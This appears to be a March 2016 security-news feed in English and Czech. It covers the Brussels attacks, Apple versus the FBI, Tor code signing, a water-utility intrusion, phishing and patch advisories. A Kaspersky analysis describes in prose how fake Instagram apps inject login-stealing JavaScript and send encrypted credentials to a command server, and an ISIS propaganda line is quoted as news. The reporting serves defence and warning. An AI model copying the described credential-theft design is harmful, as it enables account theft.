Update 2016-03- 22, 14:00 GMT
The blood feud is lengthy, o dogs of Europe… Did you think for a day that we would forget to avenge your occupation of the Muslims’ lands?”

1/2 One top #ISIS distribution account celebrated #Brusselsattack: “”The blood feud is lengthy, o dogs of Europe…

Update 2016-03- 23, 11:30 GMT
According to La Derniere Heure press, the man arrested isn’t Najim Laachraoui.

Update 2016-03- 23, 10:00 GMT
Attack in Brussels, authorities arrested the third man, the alleged the artificer.

Update 2016-03- 23, 9:00 GMT
The authorities have identified two suicide bombers, the brothers Khaled and Ibrahim El Bakraoui. The third man that wears a hat on the right would be the artificer of the group and according to the intelligence, he is the same artificer of the Paris attacks.

Brussels explosions terrorits


Tor zlepšuje zabezpečení, dokáže odhalit špehovací kód

23.3.2016 Zabezpečení
Společnost již tři roky vylepšuje své schopnosti při odhalování podvodného softwaru.

Projekt Tor zdokonalil svůj software na takovou úroveň, že dokáže rychle detekovat, zda se s konkrétní sítí nějak manipulovalo pro sledovací účely, napsal v pondělí jeden z hlavních developerů projektu.

Panují obavy, že by Tor mohl být buď rozvrácen, či omezen soudními příkazy, což by mohlo přimět projekt předat citlivé informace vládním společnostem; tedy podobný případ, jako je současný spor Apple vs. soud Spojených států.

Vývojáři Toru tedy nyní vytváří systém takovým způsobem, aby vícero lidí mohlo zkontrolovat, zda kód nebyl pozměněn a který „eliminuje jednotlivá selhání,“ napsal také v pondělí Mike Perry, hlavní vývojář prohlížeče Tor Browser.

Během několika posledních let se Tor soustředil na to umožnit uživatelům přístup k jejich zdrojovému kódu, který si následně mohou pozměnit a vytvořit tak vlastní buildy Toru, jež se dají následně ověřit veřejnými šifrovacími klíči organizace a jinými kopiemi aplikace.

„I kdyby vláda nebo zločinci získali naše šifrovací klíče, naše sítě a její uživatelé by zvládli rychle odhalit tuto skutečnost a nahlásit ji jako bezpečnostní hrozbu,“ pokračuje Perry. „Z technického pohledu, naše revize a proces vývoje zdrojového kódu způsobují, že pravděpodobnost odhalení takového škodlivého kódu by byla vysoká, a náprava rychlá.“

Minimálně dva šifrovací klíče by byly potřeba, aby upravená verze Tor Browseru alespoň zpočátku překonala bezpečnostní opatření: SSL/TSL klíč, který zabezpečuje spojení mezi uživatelem a Torem, a klíč užívaný jako podpis softwarových aktualizací.

„Právě teď jsou potřeba dva klíče, a tyto klíče ani nemají k dispozici ti samí lidé,“ píše Perry v Q&A na konci svého příspěvku. „Také jsou oba zabezpečeny různým způsobem.“

I kdyby útočník klíče získal, teoreticky by uživatelé byli schopni prozkoumat hash sofwaru a tak přijít na to, zda nebyl škodlivě upraven.

Apple zatím bojuje s příkazem federálního soudu, aby vytvořil speciální verzi iOS 9, která by odstranila bezpečnostní opatření na iPhonu 5c, používaný Syedem Rizwanem Farookem, strůjcem masakru v San Bernardinu.

Naplnění rozsudku se obává mnoho technologických společností, neboť by vládě poskytl snadný způsob, jak podkopat šifrovací systém jejich produktů.

Americký úřad spravedlnosti v pondělí uvedl, že pátrá po jiných možnostech, jak se dostat to iPhonu Farooka. V tom případě by pomoc Applu stát nepotřeboval.

Perry dále napsal, že společnost Tor Project „stojí za Applem a jeho rozhodnutím bránit šifrování a odporovat tlaku vlády. Nikdy nevytvoříme zadní vrátka pro náš software.“

Tor, zkratka pro The Onion Router („cibulový router“) je síť, která poskytuje anonymní přístup k internetu pomocí upraveného prohlížeče Firefox. Projekt započala Laboratoř pro námořní výzkum ve Spojených státech, ale teď ji řídí nezisková organizace Tor Project.

Prohlížení webu je šifrováno a zajišťováno skrze různé proxy servery, což výrazně stěžuje možnost zjistit skutečnou IP adresu počítače. Tor je životně důležitá aplikace pro aktivisty a disidenty, neboť poskytuje silnou vrstvu soukromí a anonymity.

Některé z funkcí Toru však využili též kriminální živly, především kyberzločinci. To vyvolalo zájem u bezpečnostních agentur po celém světě. Tisíce webů běží skrytě na systému Toru a mají speciální „.onion“ URL; dá se tak na ně připojit pouze skrze upravený prohlížeč.

The Silk Road, „hedvábná stezka,“ byl undegroundový, částečně ilegální trh, zavřený FBI v říjnu 2013. Šlo o jednu z nejznámějších služeb, využívajících pro svou činnost právě Tor.


FBI may have found a New Way to Unlock Shooter's iPhone without Apple
23.3.2016 Apple
There's more coming to the high-profile Apple vs. FBI case.
The Federal Bureau of Investigation (FBI) might not need Apple's assistance to unlock iPhone 5C that belonged to San Bernardino shooter, Syed Rizwan Farook.
If you have followed the San Bernardino case closely, you probably know everything about the ongoing encryption battle between the FBI and Apple.
In short, the US Department of Justice (DOJ) wants Apple to help the FBI create a backdoored version of its iOS operating system that could let it access data on Farook's locked iPhone 5C.
Apple, meanwhile, is evident on its part, saying that the FBI wants the company to effectively create the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
FBI to Apple: We'll Unlock iPhone by Our Own
Now the Feds say they may be able to crack the iPhone without the Apple's assistance after all.
In a court filing [PDF] submitted on Monday in a central California federal court, the DOJ requested a motion to cancel a Tuesday hearing and to suspend the proceedings at least until next month.
United States Magistrate Sheri Pym, the judge who previously ordered Apple to help the FBI unlock the encrypted iPhone, granted the request.
The cancelled hearing is because the FBI wants some time to test an alternate method for unlocking the shooter's iPhone that will not involve Apple building a backdoored iOS version.
Although the DOJ declined to comment on who is providing help to the FBI, this doesn't mean the case has been closed because the Feds still have to make sure their new technique will work.
"On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook's iPhone," the motion reads.
"Testing is required to determine whether it is a [feasible] method that'll not compromise data on Farook's iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case."
FBI Wants Encryption Backdoor to Unlock More iPhones
The Feds likely already discovered this alternative method, but sought Apple's help to create a backdoor so that they could exploit the precedent for solving other pending cases, as the agency is seeking Apple's help to unlock iPhones in at least nine other cases.
But, there are some points the FBI must keep in mind before trying their alternate way to get into Farook's iPhone 5C.
If you copy the hard drive, all the data from the iPhone will remain scrambled, which will be of no use.
If you enter 10 wrong passwords, the whole iPhone will be wiped off, which means if your method fails, you'll never recover the data from the shooter's iPhone.
However, if the FBI method isn't able to unlock Farook's iPhone, the agency will again have to go back to the court to enforce the order on Apple.
Who, according to you, is this outside party?
Hacker? Security researcher? Or some Cyber-forensic expert? Let us know in the comments below.


Cyber attacks on systems at a water utility, a scaring reality
23.3.2016 Computer Attack

According to the recent Verizon breach digest for March 2016 hackers breached a water utility and manipulated systems for water treatment and flow control.
The story that I’m telling you is very disturbing, according to the Verizon breach digest for March 2016 a group of hackers breached a water utility and manipulated systems for water treatment and flow control.
The Verizon breach digest reports a number of cyber attacks including one against an unnamed water utility, described in the document as the Kemuri Water Company (KWC).

The operator behind the water utility hired Verizon to assess its systems, during the investigation the experts discovered evidence of cyber attacks.

Comment Crew hit decoy water facility

The experts discovered a desolating situation, a number of systems affected by critical vulnerabilities were publicly exposed on the Internet and the overall architecture was including outdated operation technology (OT) systems.

“The OT end of the water district relied heavily on antiquated computer systems running operating systems from ten plus years ago.” states the report.

The entire control infrastructure was relying on an IBM AS/400 system, a system dated 1988, that was used by the operator to control every OT device in the facility (i.e. valve and flow control applications) and IT functions (i.e. billing). More disconcerting the fact that a single employee, or an attacker, could manage the entire utility by accessing the IBM AS/400 system. If a data breach were to occur at KWC, this SCADA platform would be the first place to look.

“Even more concerning, many critical IT and OT functions ran on a single AS400 system. KWC referred to this AS400 system as its “SCADA platform.” This system functioned as a router with direct connections into several networks, ran the water district’s valve and flow control application that was responsible for manipulating hundreds of Programmable Logic Controllers (PLCs), housed customer PII and associated billing information, as well as KWC’s financials.”

Experts discovered that the KWC facility was targeted by hacktivists had that breached the internal architecture by exploiting a vulnerability in the payment application web server.

Once compromised the server, the attackers obtained the internal IP address and admin login credentials for the AS/400 system, this information was used to steal 2.5 million records containing customer and payment data. Fortunately the attackers haven’t used the stolen data to carry on fraudulent activity.

By accessing the AS/400 system the attackers were also able to completely gain control over water flow and the amount of chemicals used to treat the water.
During the 60-day period of the assessment, the experts discovered four connections to systems at the water utility. The threat actors modified application settings, fortunately without having the necessary knowledge to cause serious damage. The good news is that alerting systems allowed an early identification of any anomaly in controlled processes.

Now image possible effects of a cyber-attack launched by a persistent nation-state attacker with a deep knowledge of the internal process at the water utility.


Internetové bankovnictví bylo uzamčeno, zkouší podvodníci nový trik

23.3.2016 Phishing
Nový trik zkouší podvodníci, kteří se vydávají za zaměstnance České spořitelny. Uživatelům tvrdí, že bylo jejich internetové bankovnictví uzamčeno. Snaží se je tím přimět ke kliknutí na falešný odkaz, aby z nich mohli vylákat přihlašovací údaje. Před novými phishingovými zprávami varovali zástupci České spořitelny.
Ukázka podvodného e-mailu

FOTO: Česká spořitelna
Právě na klienty spořitelny nový podvod cílí. „Dosáhli jste maximálního počtu neúspěšných pokusů o přihlášení. Pro vaši ochranu byl přístup k on-line službě uzamčen,“ tvrdí podvodníci v nevyžádané zprávě.

Na konci textu je pak odkaz, prostřednictvím kterého je údajně možné přístup obnovit a pokračovat v procesu ověření. Tak z důvěřivců snadno vytáhnou i potvrzovací SMS zprávu, díky které pak uskuteční libovolnou platbu.

Pozornější podvod odhalí
I když grafika podvodného mailu skutečně připomíná službu Servis 24, tedy internetové bankovnictví České spořitelny, pozornější uživatelé mohou snadno odhalit, že jde o podvod. Zpráva totiž obsahuje řadu chyb, některým slovům například chybí zcela diakritika.

„Buďte k e-mailům z neznámých zdrojů velmi obezřetní. Pokud máte podezření, že jste podvodný e-mail obdrželi, v žádném případě nereagujte na jeho obsah, neklikejte na odkaz, který může být jeho součástí, a zprávu nám přepošlete na e-mailovou adresu phishing@csas.cz. Jestliže jste již na odkaz klikli a vyplnili požadované údaje, ihned kontaktujte klientskou linku České spořitelny na bezplatném telefonním čísle 800 207 207,“ poradili zástupci banky.

Stejně by lidé měli postupovat i v případě, že jim nevyžádaná zpráva přijde s hlavičkou jiné bankovní instituce. Měli by se tedy vždy obrátit na svou banku.


FBI may have found a New Way to Unlock Shooter's iPhone without Apple
22.3.2016 Apple
There's more coming to the high-profile Apple vs. FBI case.
The Federal Bureau of Investigation (FBI) might not need Apple's assistance to unlock iPhone 5C that was belonged to San Bernardino shooter Syed Rizwan Farook.
If you have followed the San Bernardino case closely, you probably know everything about the ongoing encryption battle between the FBI and Apple.
In short, the US Department of Justice (DOJ) wants Apple to help the FBI create a backdoored version of its iOS operating system that could let it access data on a locked iPhone 5C belonged to Farook.
Apple, meanwhile, is evident on its part, saying that the FBI wants the company to effectively create the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
FBI to Apple: We'll Unlock iPhone by Our Own
Now the Feds say they may be able to crack the iPhone without the Apple's assistance after all.
In a court filing [PDF] submitted on Monday in a central California federal court, the DOJ requested a motion to cancel a Tuesday hearing and to suspend the and proceedings at least until next month.
United States Magistrate Sheri Pym, the judge who previously ordered Apple to help the FBI unlock the encrypted iPhone, granted the request.
The cancelled hearing is because the FBI wants some time to test an alternate method for unlocking the shooter's iPhone that will not involve Apple building a backdoored iOS version.
Although the DOJ declined to comment on who is providing help to the FBI, this doesn't mean the case has been closed because the Feds still have to make sure their new technique will work.
"On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook's iPhone," the motion reads.
"Testing is required to determine whether it is a [feasible] method that'll not compromise data on Farook's iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case."
FBI Wants Encryption Backdoor to Unlock More iPhones
Probably the Feds already had this alternative method with themselves, but they were seeking Apple's help to create a backdoor for them so that they could exploit it to solve other pending cases, as the agency is seeking Apple's help to unlock iPhones in at least nine other cases.
But, there are some points the FBI must keep in its mind before trying their alternate way to get into Farook's iPhone 5C.
If you'll copy the hard drive, all the data from the iPhone will remain scrambled, which will be of no use.
If you'll enter 10 wrong passwords, whole iPhone will be wiped off, which means if your method gets failed, you'll never recover the data from the shooter's iPhone.
However, if the FBI method isn't able to unlock Farook's iPhone, the agency will again have to go back to the court to enforce the order on Apple.
Who, according to you, is this outside party?
Hacker?, Security researcher? Or some Cyber-forensic expert? Let us know in the comments below.


The FBI might be able to crack the San Bernardino terrorist’s iPhone without Apple’s help
22.3.2016 Apple

The US authorities announced on Monday they may have found a way to unlock the San Bernardino shooters iPhone without the Apple’s help.
The FBI says it may have discovered a method to bypass Apple security measures and unlock access the iPhone used by one of the San Bernardino attackers, and a today scheduled court hearing in the case has been postponed.

We have discussed a lot on the case FBI vs Apple, last week DOJ released a brief filing that threatens to force Apple to hand over the iOS source code if it will not help FBI in unlocking the San Bernardino shooter’s iPhone, meanwhile Edward Snowden accused the FBI of lying about his ability to unlock the mobile device.

The legal battle between Apple and the FBI raised the debate about the implementation of strong encryption in commercial products, a design choice that doesn’t allow authorities to conduct crime investigations. On December 2015, Hillary Clinton called tech companies to create a Manhattan Project for Encryption.

Now it seems that we are at the terminus, on Sunday, March 20, 2016, an independent party demonstrated to the US authorities a technique for unlocking the controversial iPhone.

“On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook’s iPhone,” revealed the lawyers for the US Government in a court filing Monday afternoon. “Testing is required to determine whether it is a viable method that will not compromise data on Farook’s iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case,”

The court filing doesn’t provide technical details on the technique, but this could represent the end of the fights, at least one important truce. Several third parties provided the FBI a number of suggestions for how it could crack the iPhone.

San Bernardino case Apple vs FBI

Apple is also worried that the San Bernardino case could set a legal precedent that would force IT giants to provide government access to users’ data even when these are protected by encryption.

In a court filing Monday, the FBI confirms that its experts have continued to look for a method to crack iPhone devices, even without the Apple’s help.

“Our top priority has always been gaining access into the phone used by the terrorist in San Bernardino,” explained the Justice Department spokeswoman Melanie Newman. “With this goal in mind, the FBI has continued in its efforts to gain access to the phone without Apple’s assistance, even during a month-long period of litigation with the company.”

Many experts speculate the FBI plans to access data by cloning the device until it is not able to guess the secret passcode. Basically, the experts will make an attempt to find the password for each against each copy.

Anyway, whatever method FBI will use, the government will file a status report by April 5, reveal the results of the procedure.

The unique certainly at the moment is the suspension of the order requiring Apple to help the FBI.

On the other side, Apple’s lawyers confirmed that the company will never provide help to the FBI.


Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro
22.3.2016 Crime

Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro, it is a terror attack. Panic and chaos in the city. The IS claims the responsibility for the attack.
This morning the Europe has fallen again in terror, just months after the Paris attacks a new wave of attacks hit the West. This morning a sequence of explosions have been detonated at Brussels Airport in an alleged suicide bomber terror attack.
“We can confirm that there have been two explosions in the departure hall. We called the emergency services on the ground – they [are] now provid[ing] first aid to the injured.” said Anke Fransen, spokeswoman for the Brussels Airport.

The first two Brussels explosions have hit the departure hall at the international Zaventem airport shortly before 8am, next to the American Airlines check-in desk. Other explosions have been detonated at the Schuman and Malbeek metro station, not far from the EU headquarters. The explosions at a metro station in Maalbeek occurred one hour later.

Brussels explosions maps
Source FT.com

A government source confirmed to VRT broadcaster that it was a terror attack, the number of victims is increasing minute after minute, last news reports at least 34 dead and hundreds people injured.

“A Belgian news agency is reporting that shots were fired and words in Arabic were heard being shouted before the blasts.” reported the British Mirror.

Brussels explosions
Source FT.comr.

Local authorities are inviting people to not come near the area under attack.

Brussels Airport’s Twitter account told followers: “There have been 2 explosions at the airport.

Local media reported that as many as 14 people were killed at the airport, with hundreds injured, and 20 killed at the metro station. These numbers are not official and must be confirmed by the authorities.

The Brussels explosions come only a day after the Belgium’s interior minister, Jan Jambon, warned possible terror attacks after the recent arrest Salah Abdeslam, one of the participants of the Paris terror attacks.

My thoughts are with the people of Brussels following these ignoble attacks.

From a cyber security perspective, I invite all to remain vigilant, crooks will try to exploit the media attention on the Brussels explosions sharing bogus videos and malicious link. It is likely we will detect a phishing campaign trying to exploit the event.


Tor Project and the new anti-tampering measures for its software
22.3.2016 Security

Tor Project revealed how the organization has conducted a three-year long work to improve its ability to detect fraudulent software.
The experts at the Tor Project are working to improve the resilience of the anonymizing network to cyber attacks, in particular, they aim to quickly detect any surveillance activity conducted by tempering the Tor system.

The researchers fear that the US Government could interfere with the Tor project by requesting the organization to turn over critical information that would compromise the security of the network and cause in de-anonymization of the users.

Mike Perry from the Tor Project, highlighted that the organization has never received a legal demand to place a backdoor in its source code, nor have we received any requests to hand over cryptographic signing material.

directory authorities Tor network 2Tor Project

The Tor Browser is an open source, this means that everyone could analyze it, the organization also implements several mechanisms to ensure the security and integrity of its software.

Now the experts want more, they are exploring further improvements to eliminate single points of failure, so that even if a threat actor obtains our cryptographic keys, the anonymizing network would be able to detect the anomalous activity. The development team behind the Tor Project is designing the system in such a way to make visible any change to the original source code.

“For this reason, regardless of the outcome of the Apple decision, we are exploring further ways to eliminate single points of failure, so that even if a government or a criminal obtains our cryptographic keys, our distributed network and its users would be able to detect this fact and report it to us as a security issue.” wrote Mike Perry.

“From an engineering perspective, our code review and open source development processes make it likely that such a backdoor would be quickly discovered.” he added.

To distribute a tampered version of the Tor Browser it would be required the access to two cryptographic keys:

the SSL/TLS key that secures the connection between a user and Tor Project servers; plus the key used to sign a software update.
the key used to sign a software update;
“Right now, two keys are required, and those keys are not accessible by the same people,” explained Perry. “They are also secured in different ways.”

Even if a persistent attacker is able to obtain the two keys, in theory, users would be able to check the software’s hash and discover any modification by checking it.


Who Viewed Your Profile on Instagram? Obviously, Hackers!
22.3.2016 Hacking
Are you curious about who viewed your profile on Instagram?
This is probably the most frequently asked question nowadays, and there are several applications available on Google Play Store and Apple App Store, which claims to offer you the opportunity to see who is looking at your Instagram profile.
But, should we believe them?
Is there really some kind of way out to know who viewed your Instagram profile?
The shortest answer to all these questions is 'NO', such functionality does not exist on Instagram at the moment.
But, thousands of users still have hope and hackers are taking advantage of this to target a broad audience.
Recently, security researchers have discovered some malicious applications on Android Google Play Store as well as iOS App Store, which are entirely a hoax, targeting Instagram users.
Who-Viewed-Me-on-Instagram
The iOS app is named "InstaCare - Who cares with me?" and is one of the top apps in Germany, while the Android app is dubbed "Who Viewed Me on Instagram" that has more than 100,000 downloads and 20,000 reviews.
Both the apps are developed by Turker Bayram – the same developer who created the malicious "InstaAgent" app for Android and iOS platform late last year that secretly stole users’ Instagram credentials.
The recent applications by Bayram also have the same functionality, luring Instagram users into believing that the app would let them know who viewed their profile. The app claims to:
Show you up to most recent 100 lists for your Instagram profile.
Display your friend list in order, who cares your profile most with your profile interaction.
But in reality…
The malicious apps abuse the authentication process to connect to Instagram and steal user's Instagram username and password, according to a blog post published by David Layer-Reiss from Peppersoft.
Since third party applications use API to authenticate themselves with the legitimate apps, users generally provide their same credentials to authenticate with different applications and services.
Here's How an App Can Hack Your Instagram Accounts
Today, it is quite easy for hackers to target large audience – Just abuse the name of a popular application and give users option beyond the legitimate one.
Users will simply provide their critical data, including their credentials, without knowing its actual consequences.
Once users install 'InstaCare' or 'Who Viewed Me on Instagram' on their iOS or Android device, they are immediately served a login window that forced victims to log in with their Instagram credentials.
Since the apps advertise itself to show you who viewed your Instagram profile, most users fall victim to the apps and enter their account credentials without a second thought.
The usernames and passwords are then encrypted and sent to the attacker's server. The attacker will then use those credentials later to secretly log on and take full control of the hacked Instagram accounts and post spams on the user's behalf.
Security researchers from Kaspersky Labs also confirmed David's findings. You can refer Kaspersky's blog post for more technical details on the malicious apps.
At the time of writing, neither Apple nor Google has removed the malicious apps from their official App Stores, which means that the malicious apps are still available to users for download.
who-viewed-my-profile-on-Instagram
It's not at all surprising that the play stores are surrounded by a number of malicious apps that may gain users' attention to fall victim for one.
But, the fact that both Apple and Google got fooled again by the same developer shows how hard it is to keep an eye on a developer who already published a malicious app and to manage the app stores in a secure manner.
Here's How to Protect Yourself
If you've already installed one of these apps and have now seen the error of your ways, and remove the culprit from your apps list too.
So if you have already fallen victim to this scam, hurry up!
Uninstall the apps mentioned above from your smartphone if you have one.
Change your Instagram password immediately.
For better security, enable two-factor authentication on your Instagram account.


Who viewed your Instagram account? And who stole your password?
22.3.2016 Zdroj: Kaspersky Hacking

Mobile applications have become one of the most efficient attack vectors, and one of the favorite methods of cybercriminals is the abuse of popular applications. Maybe you would think twice before installing any application that asks for the credentials you use to connect to your social networks, email accounts or cloud storage services?

Recently, a malicious application called “InstaCare – Who cares with me” was released via Google Play Store and App Store. David Layer-Reiss from Peppersoft, a mobile development company from Germany who discovered this threat, provided a good analysis on his blog.

This application serves as a hook to lure Instagram users, pretending to let them know who has viewed their profile; but in reality it abuses the authentication process to connect to Instagram.

In fact, it’s common for many applications to use API’s or authorization protocols such as OAuth to authenticate with third-party applications. This is very convenient for users as they can use the same credentials to authenticate with different applications and services.

The problem here is that this feature can be used maliciously for some applications to gain access to the user’s information, such as their profile and contacts, or to steal their credentials.

This isn’t the first time that this has happened. Last year we published some blog posts outlining where attackers had used malicious applications or email campaigns. Either to steal the user’s credentials – Stealing to the sound of music; or just to get access to user information – Fraudsters can have rights, too; sometimes using popular applications as a cover – Del phishing al acceso persistente (Spanish).

This kind of strategy is very successful. In this particular case, the Android version of this application alone was installed on more than 100K devices with more than 20K reviews, most of them saying that you have to pay in order for it to work correctly.

 

As with Google Play, we can also find some users in the App Store complaining about problems after installing this app.

 

It is interesting that this application was able to pass the Apple security checks and was published without any problem, even though its controls are more restrictive, without mentioning that apparently this developer already had a history of having published a malicious application before.

Attack vector

This attack installs JavaScript code into the Submit button on the Instagram login page as soon as the page has finished loading.

This code gets the content of the input fields named “username” and “password” and stores it in the local variable named “str” with the pattern “<username>,-UPPA-,<password>”. After that, it calls the function “processHTML” which stores the collected data in a class variable.

 

Other information is also collected from the user’s device and sent to the C&C via a POST request.

 

The value of the parameter “hash” is the data shown in the image above plus the Instagram username and password. This value is encrypted with AES 128 and then encoded with base64. The encryption key is generated from the ID generated by the server.

 

Do you want to know who viewed your Instagram account? How about your password?

The iOS version also uses AES 128 but the block cipher mode used is CBC instead of ECB.

 

Consequently, it uses as Initialization Vector (IV) the string “IOS123SECRETKEYS”.

 

Once opened it forces the user to login to Instagram.

 

After that the username and password are sent to the server, as well as some metadata.

 

Since we have the ID, we can decrypt the content by using a modified version of the Java code published by David. We just need to modify the crypto class initialization

 

By inputting the content of the “hash” parameter, we can decrypt the data send and find out with information has been sent to the server. As expected, the Instagram username and password is also included in this list.

 

The username and password will later be used to post spam messages to the user’s Instagram account.

The threats mentioned in this blog post are detected by Kaspersky Lab products as HEUR:Trojan-Spy.AndroidOS.Instealy.a and HEUR:Trojan-Spy.IphoneOS.Instealy.a.

Conclusion

Mobile environments are one of the best targets for cybercriminals; they usually have access to email accounts, social networks, contacts and even the places you have visited.

The use of social networking is one of the best ways to distribute malicious content. We have to be aware of unknown applications that promise something that isn’t provided by the service that we are using. Usually, if the feature does not exist on the service website, it will be hard for third-party software to provide it.


Thank you, CanSecWest16!

22.3.2016 Zdroj: Kaspersky Safety

This year, we had the absolute pleasure of being a part of CanSecWest’s fantastic lineup of talks, well-rewarded pwnage, and entertainment among a jovial crowd of infosec practitioners of every stripe. The diversity of the crowd really cannot be overstated as your usual network defenders, hardware and software developers, threat intelligencers (like ourselves) are peppered in with a fair amount of exploit developers sizing up their competition. This year’s Pwn2Own awarded a whopping $460,000 to four out of five teams for successful exploitations of Google Chrome, Microsoft Edge, and Apple Safari browsers. Of these, Tencent Security’s Team Sniper took the lead and the title of ‘Master of Pwn’ embroidered in a pretty sweet purple smoking jacket. We only wished someone would have mastered the always difficult “VM escape”.

The mix of talks was heavily skewed towards exploitation with some very interesting vulnerabilities discussed like Haifei Li and Chong Xu’s talk on Microsoft Outlook security. This talk should’ve scared the pants off of anyone in the crowd as Haifei demoed his now patched BadWinMail exploit that allowed the mere preview of an email on outlook to pop calc.exe. This is the sort of exploit that reminds us that all of the tips and explanations we give end users don’t carry that much weight in the face of a truly advanced attacker with a sense of creativity. There were no links clicked or attachments executed, in some cases (if the malicious email is the latest received when Outlook is first run) the application will preview the malicious email without user interaction required. Zooming out a little bit, we should consider that even though many threat actors are moving away from fancy exploits (finding that inexpensive phishing or macro-laced documents provide good enough results), this is the sort of exploit that the 1% threat actors absolutely love. So perhaps the immediate takeaway should be: “Why the hell isn’t Outlook sandboxed?”

While the majority of the talks focused heavily on exploitation and vulnerabilities, our talk dealt with the usage of false flags and deception techniques by well-known (and some unknown) APT actors. We were skeptical we could hold a full crowd given the skew towards vuln-centric talks, but were pleasantly surprised by the turnout and the warm reception. As we took the crowd through a brief overview of attribution, pitfalls encountered, and techniques being utilized by the bad guys, it was clear to us this topic has not received enough attention in the community. The questions asked during and after the presentation focused mainly on opinions as to whether or not attribution is even needed in the grand scheme of things. While we don’t want to give away our secret sauce just yet (as this is an ongoing project), some of the actors we focused on included Cloud Atlas (AKA Inception Framework), Turla, Lazarus, Sofacy, big bad Duqu, and perhaps a new player. Stay tuned for a very thorough treatment of this topic.

CanSecWest has become a true favorite with GReAT researchers for its welcoming atmosphere and diverse but friendly crowd open to new research topics and hard discussions on ongoing problems. It’s rare to find such a great mix of people from all walks at a conference that isn’t so large or overly commercial. We are looking forward to CSW 2017! Won’t you join us?


Google issued an emergency patch for critical CVE-2015-1805 flaw

22.3.2016 Vulnerebility

Google released an emergency security patch to fix the local elevation of privilege vulnerability CVE-2015-1805 affecting its OS.
Google has released an emergency security patch to fix the local elevation of privilege vulnerability CVE-2015-1805 affecting the kernel of the Android OS of certain devices.

The vulnerability is ranked as critical and can be exploited by rooting applications that users have installed on their devices to elevate privileges and run arbitrary code on the vulnerable device.

The security flaw is very old, it was discovered in the upstream Linux kernel years ago and fixed in April 2014. Unfortunately, the flaw was underestimated until last month when the C0RE Team reported to Google that it was possible to exploit it to target the Android OS.

All unpatched Android devices running OS based on kernel versions 3.4, 3.10 and 3.14, including all Nexus devices are vulnerable to the CVE-2015-1805 vulnerability, meanwhile devices based on Linux kernel version 3.18 or higher are not affected.

Nexus Rooting CVE-2015-1805

Google has already blocked the installation of software that triggers the flaw, both within Google Play and outside of Google Play, through Verify Apps.

“We already block installation of rooting applications that use this vulnerability — both within Google Play and outside of Google Play — using Verify Apps, and have updated our systems to detect applications that use this specific vulnerability.” states the advisory issued by Google.”To provide a final layer of defense for this issue, partners were provided with a patch for this issue on March 16, 2016. Nexus updates are being created and will be released within a few days. Source code patches for this issue have been released to the Android Open Source Project (AOSP) repository.”

Google warns owners of vulnerable devices that could be permanently compromised by exploiting the flaw and in some circumstances, it could be necessary a re-flash of the operating system in order to remove malicious applications.

“An elevation of privilege vulnerability in the kernel could enable a local malicious application to execute arbitrary code in the kernel. This issue is rated as a Critical severity due to the possibility of a local permanent device compromise and the device would possibly need to be repaired by re-flashing the operating system.” continue the advisory.

Google has collected evidence of this vulnerability being abused on a Nexus 5 using a publicly available rooting tool, but there is no malicious exploitation of the security flaw.

Google created Nexus updates that will be released within a few days, the company has already notified its partners on this security vulnerability.

“Source code patches for this issue have been released to the Android Open Source Project (AOSP) repository.” states the advisory.

To mitigate the risk of exposure, users should have on their Android devices a security patch level of March 18, 2016, or a security patch level of April 2, 2016 and later.


Apple Updates Everything (Again)

22.3.2016 Vulnerebility

As part of today's product announcements, Apple released new operating systems across its different products. In addition to new features, these updates do address a number of security issues as well.
OS X Server 5.1 ( for Yosemite 10.10.5 )

This update improves warnings in case the administrator stores backups insecurely and removes old SSL ciphers (RC4). Also, authentication bypass issues are addressed in the Wiki.
Safari 9.1

The Safari update is available for OS X back to 10.9 (Mavericks). It fixes a total of 12 vulnerabilities, some can be used to execute arbitrary code.
OS X El Capitan 10.11.4 (Security Update 2016-002)

A total of 59 vulnerabilities are patched (I hope I counted them right). Here are some of the highlights:

Apple USB Networking (CVE-2016-1734): This vulnerability could lead to arbitrary code execution if a malicious USB devices is connected to the computer.

Bluetooth (CVE-2016-1735/1736): Bluetooth can be used to execute arbitrary code. It isn't clear (but likely) that you first need to pair with the device which would mitigate the problem somewhat.

Messages (CVE-2016-1788): This vulnerability, which would allow the interception of iMessage messages has gotten a lot of press in the last couple days.

OpenSSH (CVE-2016-0777,0778): The roaming vulnerablity that could lead to a leak of the private key is fixed in this patch.

Wi-Fi (CVE-2016-0801/0802): A malicious WiFi frame could be used to execute arbitrary code. Since this requires an unspecified ether type, I am assuming that this requires that the victim first associates with the network. But the advisory doesn't provide sufficient details to tell for sure.
XCode 7.3:

Two vulnerabilities. One in otool (a tool to display object files) and another two vulnerabilities in subversion.
WatchOS 2.2:

A lot of overlap here with the OS X and Safari patches. Note that the Watch is also vulnerable to the WiFi exploits, but not the Bluetooth issues.
iOS 9.3:

A total of 36 vulnerabilities, many of which are also patched for OS X. The Wifi vulnerability applies to iOS just as for the WatchOS and OS X.

TVOS 9.2

Again a lot of overlap with the other updates.

In short: patch...

For details from Apple, please refer to the usual security bulletin page: https://support.apple.com/en-us/HT201222


Coming soon, Denmark’s intelligence presents the Danish Hacker Academy
21.3.2016 Hacking

The Danish intelligence agency PET (Politiets Efterretningstjeneste) plans to start its Danish hacker academy to fight threat actors in the cyberspace.
Denmark’s PET (Politiets Efterretningstjeneste), the country’s intelligence agency, announced last week plans to create a government ‘hacker academy’ in response to the need to improve country cyber security.

The Danish hacker academy is a hacking school that will train black hat hackers for offensive and defensive purposes starting from August 1, 2016.

The Danish security and intelligence service PET will recruit talented IT nerds interested in supporting the activities of the Danish Government in the cyber space. The PET is worried by the militarization of the cyberspace state, foreign governments could use cyber tools for offensive purpose aimed to cyber espionage and sabotage.

The Danish intelligence also plans to train its cyber army against terrorist organisations online.

The Danish Government has launched a media campaign using the following the slogan:

“Have you got what it takes to become a member of a secret elite unit?”
Danish hacker academy

Lars Findsen, the head of PET, is confident that Government experts could support the growth of talented nerds.

“This is not about fully-capable hackers – hopefully, there are not many of those out there, anyways – but about people who have the basic skills we can build on,” Findsen told Politiken.

